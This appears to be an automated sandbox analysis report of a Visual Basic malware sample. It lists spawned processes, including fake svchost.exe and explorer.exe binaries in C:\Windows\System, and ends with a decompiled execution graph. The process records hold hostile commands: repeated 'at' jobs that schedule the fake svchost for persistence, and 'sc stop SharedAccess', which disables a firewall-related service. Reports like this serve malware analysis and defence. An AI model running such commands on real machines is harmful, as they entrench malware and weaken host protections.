                                                                                  Target ID:28
                                                                                  Start time:09:09:32
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:29
                                                                                  Start time:09:09:32
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:30
                                                                                  Start time:09:09:32
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:31
                                                                                  Start time:09:09:33
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:32
                                                                                  Start time:09:09:33
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:33
                                                                                  Start time:09:09:33
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:34
                                                                                  Start time:09:09:34
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System\explorer.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\windows\system\explorer.exe" RO
                                                                                  Imagebase:0x400000
                                                                                  File size:281083 bytes
                                                                                  MD5 hash:A6F18E47BFFD6F5C4AA28B67644DBDBE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic

                                                                                  General

                                                                                  Target ID:35
                                                                                  Start time:09:09:34
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:36
                                                                                  Start time:09:09:35
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:38
                                                                                  Start time:09:09:35
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:39
                                                                                  Start time:09:09:35
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:40
                                                                                  Start time:09:09:36
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:41
                                                                                  Start time:09:09:37
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:42
                                                                                  Start time:09:09:37
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:43
                                                                                  Start time:09:09:37
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:44
                                                                                  Start time:09:09:38
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:45
                                                                                  Start time:09:09:38
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:46
                                                                                  Start time:09:09:38
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:47
                                                                                  Start time:09:09:38
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:48
                                                                                  Start time:09:09:39
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:49
                                                                                  Start time:09:09:39
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:50
                                                                                  Start time:09:09:40
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:51
                                                                                  Start time:09:09:40
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:52
                                                                                  Start time:09:09:42
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\windows\system\svchost.exe" RO
                                                                                  Imagebase:0x400000
                                                                                  File size:281069 bytes
                                                                                  MD5 hash:B61A3DA9B4DB4644497B9CC1BE87515F
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic

                                                                                  General

                                                                                  Target ID:53
                                                                                  Start time:09:09:44
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:54
                                                                                  Start time:09:09:45
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:sc stop SharedAccess
                                                                                  Imagebase:0xb50000
                                                                                  File size:60928 bytes
                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:55
                                                                                  Start time:09:09:45
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:56
                                                                                  Start time:09:09:45
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:sc config Schedule start= auto
                                                                                  Imagebase:0xb50000
                                                                                  File size:60928 bytes
                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Target ID:57
                                                                                  Start time:09:09:45
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.5%
                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                    Signature Coverage:0.6%
                                                                                    Total number of Nodes:788
                                                                                    Total number of Limit Nodes:41
                                                                                    execution_graph 9461 40a840 __vbaChkstk 9462 40a895 9461->9462 9463 40a8c8 9462->9463 9464 40a8ac __vbaNew2 9462->9464 9465 40a907 __vbaHresultCheckObj 9463->9465 9466 40a92a 9463->9466 9464->9463 9465->9466 9467 40a967 __vbaHresultCheckObj 9466->9467 9468 40a98a 9466->9468 9469 40a994 __vbaFreeObj 9467->9469 9468->9469 9470 40a9c3 9469->9470 9471 40a9b6 __vbaEnd 9469->9471 9472 40a9d3 __vbaNew2 9470->9472 9473 40a9ef 9470->9473 9471->9470 9472->9473 9474 40aa51 9473->9474 9475 40aa2e __vbaHresultCheckObj 9473->9475 9476 40aa89 __vbaHresultCheckObj 9474->9476 9477 40aaac 9474->9477 9475->9474 9478 40aab6 __vbaFreeObj 9476->9478 9477->9478 9479 40aad7 9478->9479 9480 40aae8 __vbaHresultCheckObj 9479->9480 9481 40ab0b 9479->9481 9480->9481 9482 40ab41 9481->9482 9483 40ab25 __vbaNew2 9481->9483 9484 40ab80 __vbaHresultCheckObj 9482->9484 9485 40aba3 9482->9485 9483->9482 9484->9485 9486 40ac00 9485->9486 9487 40abdd __vbaHresultCheckObj 9485->9487 9488 40ac0a #618 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeObj 9486->9488 9487->9488 9489 40ac66 9488->9489 9490 40ad88 9488->9490 9491 40ac92 9489->9491 9492 40ac76 __vbaNew2 9489->9492 9493 40adb4 9490->9493 9494 40ad98 __vbaNew2 9490->9494 9497 40acd1 __vbaHresultCheckObj 9491->9497 9498 40acf4 9491->9498 9492->9491 9495 40adf3 __vbaHresultCheckObj 9493->9495 9496 40ae16 9493->9496 9494->9493 9495->9496 9499 40ae50 __vbaHresultCheckObj 9496->9499 9500 40ae73 9496->9500 9497->9498 9501 40ad51 9498->9501 9502 40ad2e __vbaHresultCheckObj 9498->9502 9503 40ae7d __vbaStrCat __vbaStrMove __vbaFreeStr __vbaFreeObj 9499->9503 9500->9503 9504 40ad5b __vbaStrMove __vbaFreeObj 9501->9504 9502->9504 9505 40aea9 __vbaStrCopy 9503->9505 9504->9505 9793 4115d0 __vbaLenBstr 9505->9793 9507 40aec7 __vbaStrMove __vbaStrCopy __vbaFreeStrList 9851 429ca0 9507->9851 9509 40af00 __vbaStrMove __vbaStrCopy __vbaFreeStr 9510 40af31 __vbaNew2 9509->9510 9511 40af4d 9509->9511 9510->9511 9512 40af8c __vbaHresultCheckObj 9511->9512 9513 40afaf 9511->9513 9512->9513 9514 40afe9 __vbaHresultCheckObj 9513->9514 9515 40b00c 9513->9515 9516 40b016 11 API calls 9514->9516 9515->9516 9517 429ca0 18 API calls 9516->9517 9518 40b0b4 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaStrCopy 9517->9518 9519 4115d0 98 API calls 9518->9519 9520 40b0f3 16 API calls 9519->9520 9521 4115d0 98 API calls 9520->9521 9522 40b1e6 18 API calls 9521->9522 9523 4115d0 98 API calls 9522->9523 9524 40b2f7 8 API calls 9523->9524 9525 4115d0 98 API calls 9524->9525 9526 40b378 8 API calls 9525->9526 9527 4115d0 98 API calls 9526->9527 9528 40b3f1 __vbaStrMove __vbaStrCopy __vbaFreeStrList 9527->9528 9861 4228e0 10 API calls 9528->9861 9530 40b42e 7 API calls 9531 40b557 __vbaStrCmp 9530->9531 9532 40b4aa __vbaStrCat __vbaStrMove 9530->9532 9533 40b578 9531->9533 9534 40b6af __vbaStrCmp 9531->9534 9917 42a090 6 API calls 9532->9917 9538 4228e0 134 API calls 9533->9538 9536 40b6d0 9534->9536 9537 40b76c __vbaStrCmp 9534->9537 9540 4228e0 134 API calls 9536->9540 9542 40b829 __vbaStrCmp 9537->9542 9543 40b78d 9537->9543 9541 40b58a 9538->9541 9546 40b6e2 9540->9546 9547 40b5d2 __vbaStrCat __vbaStrMove 9541->9547 9931 415af0 __vbaChkstk __vbaOnError 9541->9931 9548 40b9f2 __vbaStrCopy 9542->9548 9549 40b84a __vbaStrCmp 9542->9549 9550 4228e0 134 API calls 9543->9550 9553 40b72a #600 __vbaEnd 9546->9553 9561 415af0 30 API calls 9546->9561 9556 42a090 20 API calls 9547->9556 9557 4115d0 98 API calls 9548->9557 9549->9548 9555 40b86c 9549->9555 9551 40b79f 9550->9551 9559 40b7e7 #600 __vbaEnd 9551->9559 9566 415af0 30 API calls 9551->9566 9553->9548 9985 411f00 __vbaChkstk __vbaOnError 9555->9985 9564 40b60e __vbaFreeStr __vbaStrCat __vbaStrMove 9556->9564 9558 40ba10 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 9557->9558 9565 4115d0 98 API calls 9558->9565 9559->9548 9567 40b6fb 9561->9567 9570 42a090 20 API calls 9564->9570 9572 40ba59 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 9565->9572 9573 40b7b8 9566->9573 9574 4259a0 219 API calls 9567->9574 9569 40b87d 9576 40b890 __vbaLenBstr 9569->9576 9571 40b653 __vbaFreeStr 9570->9571 9577 4296c0 122 API calls 9571->9577 9578 4115d0 98 API calls 9572->9578 9579 4259a0 219 API calls 9573->9579 9580 40b715 #580 9574->9580 9575 40b5bd #580 9575->9547 9581 40b9e5 __vbaEnd 9576->9581 9582 40b8ab 9576->9582 9584 40b66d #600 __vbaEnd 9577->9584 9585 40baa2 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 9578->9585 9586 40b7d2 #580 9579->9586 9580->9553 9581->9548 9582->9581 9583 40b8bd #598 9582->9583 9611 40b9da __vbaSetSystemError 9582->9611 9587 40cfd8 __vbaErrorOverflow 9583->9587 9588 40b8dd __vbaInStr 9583->9588 9584->9548 9589 429ca0 18 API calls 9585->9589 9586->9559 9593 40cfe0 __vbaChkstk __vbaOnError 9587->9593 9590 40b91e 9588->9590 9591 40b901 __vbaLenBstr 9588->9591 9592 40bae9 __vbaStrMove 9589->9592 9590->9587 9598 40b957 #631 __vbaStrMove 9590->9598 9591->9587 9591->9590 9594 4115d0 98 API calls 9592->9594 9595 40d4e0 9593->9595 9596 40d04a 9593->9596 9597 40bafe __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList 9594->9597 9602 40d08f 9596->9602 9603 40d06f __vbaHresultCheckObj 9596->9603 9599 429ca0 18 API calls 9597->9599 10267 41f5c0 __vbaChkstk __vbaStrCopy __vbaFixstrConstruct __vbaOnError __vbaStrToAnsi 9598->10267 9601 40bb51 6 API calls 9599->9601 9605 4115d0 98 API calls 9601->9605 9609 40d0d7 9602->9609 9610 40d0ba __vbaHresultCheckObj 9602->9610 9603->9602 9607 40bbae 8 API calls 9605->9607 9608 429ca0 18 API calls 9607->9608 9612 40bc25 __vbaStrMove 9608->9612 9615 40d522 __vbaErrorOverflow 9609->9615 9616 40d0ed __vbaI2I4 __vbaFreeObj 9609->9616 9610->9609 9611->9582 9613 4115d0 98 API calls 9612->9613 9614 40bc3a __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList 9613->9614 9876 41e880 6 API calls 9614->9876 9618 40d530 __vbaOnError 9615->9618 9619 40d138 9616->9619 9621 40d58a __vbaObjSet 9618->9621 9622 40d57a __vbaNew2 9618->9622 9619->9595 9626 40d15f __vbaObjSet 9619->9626 9620 40bc8b __vbaStrMove __vbaStrCopy __vbaFreeStr 9882 41e9d0 6 API calls 9620->9882 9632 40d5bc 9621->9632 9622->9621 9624 40bcb8 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaStrCmp 9627 40c142 __vbaStrCmp 9624->9627 9628 40bcfc 9624->9628 9633 40d17d 9626->9633 9630 40c655 __vbaStrCopy 9627->9630 9631 40c165 9627->9631 9629 4228e0 134 API calls 9628->9629 9634 40bd1f 9629->9634 9640 4115d0 98 API calls 9630->9640 9635 4228e0 134 API calls 9631->9635 9636 40d5d1 __vbaObjSet 9632->9636 9637 40d5c2 __vbaHresultCheckObj 9632->9637 9638 40d1a5 9633->9638 9639 40d188 __vbaHresultCheckObj 9633->9639 9641 40bd67 __vbaStrCat #600 __vbaFreeVar 9634->9641 9647 415af0 30 API calls 9634->9647 9642 40c177 9635->9642 9645 40d5e9 9636->9645 9637->9636 9638->9615 9644 40d1bd __vbaFreeObj 9638->9644 9639->9638 9643 40c673 __vbaStrMove __vbaStrCopy 9640->9643 9649 40bdb5 9641->9649 9650 40bdc7 __vbaStrCopy 9641->9650 9648 40c1bf __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 9642->9648 9657 415af0 30 API calls 9642->9657 9646 4115d0 98 API calls 9643->9646 9651 40d1dd 9644->9651 9652 40d5fe __vbaFreeObjList __vbaExitProc 9645->9652 9653 40d5ef __vbaHresultCheckObj 9645->9653 9654 40c695 13 API calls 9646->9654 9656 40bd38 9647->9656 9662 40c22a 9648->9662 9658 40bdc1 __vbaSetSystemError 9649->9658 9655 4115d0 98 API calls 9650->9655 9675 40d23c 9651->9675 9676 40d21c __vbaHresultCheckObj 9651->9676 9660 40d636 9652->9660 9653->9652 9888 4218d0 12 API calls 9654->9888 9661 40bde5 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 9655->9661 9663 4259a0 219 API calls 9656->9663 9664 40c190 9657->9664 9658->9650 9667 4115d0 98 API calls 9661->9667 9668 40c23b __vbaHresultCheckObj 9662->9668 9669 40c25e 9662->9669 9670 40bd51 #580 9663->9670 9665 4259a0 219 API calls 9664->9665 9671 40c1aa #580 9665->9671 9666 40c78d __vbaFreeStrList 9672 40c7ba __vbaEnd 9666->9672 9673 40c7cc 9666->9673 9674 40be2e 6 API calls 9667->9674 9677 40c268 __vbaFreeObj 9668->9677 9669->9677 9670->9641 9671->9648 9678 40c90e __vbaStrCopy 9672->9678 9679 4228e0 134 API calls 9673->9679 9680 4115d0 98 API calls 9674->9680 9681 40d246 __vbaChkstk 9675->9681 9676->9681 9685 40c287 __vbaStrCopy 9677->9685 9682 4115d0 98 API calls 9678->9682 9683 40c7de 9679->9683 9684 40be95 8 API calls 9680->9684 9689 40d28e 9681->9689 9686 40c92c __vbaStrMove __vbaStrCopy 9682->9686 9683->9678 9687 40c7ea #535 9683->9687 9688 4115d0 98 API calls 9684->9688 9690 4115d0 98 API calls 9685->9690 9691 4115d0 98 API calls 9686->9691 9692 40cfd3 9687->9692 9693 40c80a 8 API calls 9687->9693 9694 40bf16 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList 9688->9694 9695 40d2b6 9689->9695 9696 40d299 __vbaHresultCheckObj 9689->9696 9697 40c2a5 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 9690->9697 9698 40c94e 7 API calls 9691->9698 9692->9587 10324 41a5a0 __vbaChkstk __vbaStrCopy __vbaAryConstruct2 __vbaOnError 9693->10324 10284 415ec0 9694->10284 9701 40d2c0 __vbaObjSet 9695->9701 9696->9701 9702 4115d0 98 API calls 9697->9702 9703 40ca0a #580 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 9698->9703 9711 40d2f8 __vbaFreeObjList 9701->9711 9706 40c2ee __vbaStrMove __vbaStrCopy __vbaFreeStrList 9702->9706 9707 42a090 20 API calls 9703->9707 9710 429ca0 18 API calls 9706->9710 9714 40ca73 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 9707->9714 9717 40c327 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaStrCopy 9710->9717 9712 40d4d4 9711->9712 9713 40d327 9711->9713 9728 40d36c 9713->9728 9729 40d34c __vbaHresultCheckObj 9713->9729 9719 42a090 20 API calls 9714->9719 9718 4115d0 98 API calls 9717->9718 9721 40c366 8 API calls 9718->9721 9722 40cad9 __vbaFreeStrList 9719->9722 9727 4115d0 98 API calls 9721->9727 9730 4296c0 122 API calls 9722->9730 9733 40c3ea __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaLenBstr 9727->9733 9734 40d376 __vbaChkstk 9728->9734 9729->9734 9735 40cafd 9730->9735 9732 40bfae 9736 40bfe2 9732->9736 9737 40bfbf __vbaHresultCheckObj 9732->9737 9733->9587 9738 40c432 #616 __vbaStrMove __vbaStrCopy __vbaFreeStr #709 9733->9738 9743 40d3be 9734->9743 9739 4228e0 134 API calls 9735->9739 9741 40bfec 9 API calls 9736->9741 9737->9741 9738->9587 9742 40c4a4 18 API calls 9738->9742 9740 40cb10 9739->9740 9744 40cb58 __vbaStrCat __vbaStrMove 9740->9744 9748 415af0 30 API calls 9740->9748 10306 41a980 __vbaChkstk __vbaStrCopy __vbaAryConstruct2 __vbaOnError 9741->10306 9751 40c5e4 __vbaObjSet 9742->9751 9746 40d3ef __vbaObjSet 9743->9746 9747 40d3cf __vbaHresultCheckObj 9743->9747 10344 429830 8 API calls 9744->10344 9766 40d44b 9746->9766 9747->9746 9752 40cb29 9748->9752 9758 40c609 9751->9758 9756 4259a0 219 API calls 9752->9756 9760 40cb42 #580 9756->9760 9762 40c61a __vbaHresultCheckObj 9758->9762 9763 40c63d 9758->9763 9760->9744 9765 40c647 __vbaFreeObj 9762->9765 9763->9765 9765->9703 9768 40d473 9766->9768 9769 40d456 __vbaHresultCheckObj 9766->9769 9770 40d47d __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 9768->9770 9769->9770 9770->9712 9848 41162e 9793->9848 9794 411896 __vbaStrCopy 9795 4118a2 __vbaFreeStr 9794->9795 9795->9507 9796 411656 #631 __vbaStrMove #516 9797 4118eb __vbaErrorOverflow 9796->9797 9796->9848 9799 411900 #594 __vbaFreeVar #593 9797->9799 9800 411b20 9799->9800 9801 411992 #714 __vbaI4Var __vbaFreeVarList 9799->9801 9802 411b25 __vbaErrorOverflow 9800->9802 9801->9802 9803 4119ce #537 __vbaStrMove 9801->9803 9804 411b30 __vbaErase __vbaRedim __vbaAryLock 9802->9804 9822 4119f0 9803->9822 